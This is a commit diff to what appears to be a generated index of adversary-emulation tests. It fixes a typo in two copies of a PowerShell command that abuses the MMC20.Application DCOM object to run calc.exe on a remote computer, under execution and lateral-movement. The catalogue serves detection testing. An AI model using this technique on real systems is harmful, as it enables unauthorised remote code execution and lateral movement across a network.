Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
c8520ab1af
commit
06c2cb5074
@@ -26425,7 +26425,7 @@ execution:
|
||||
default: computer1
|
||||
executor:
|
||||
name: powershell
|
||||
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
||||
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
||||
$null, $null, "7")
|
||||
|
||||
'
|
||||
@@ -27949,7 +27949,7 @@ lateral-movement:
|
||||
default: computer1
|
||||
executor:
|
||||
name: powershell
|
||||
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
||||
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
||||
$null, $null, "7")
|
||||
|
||||
'
|
||||
|
||||
Reference in New Issue
Block a user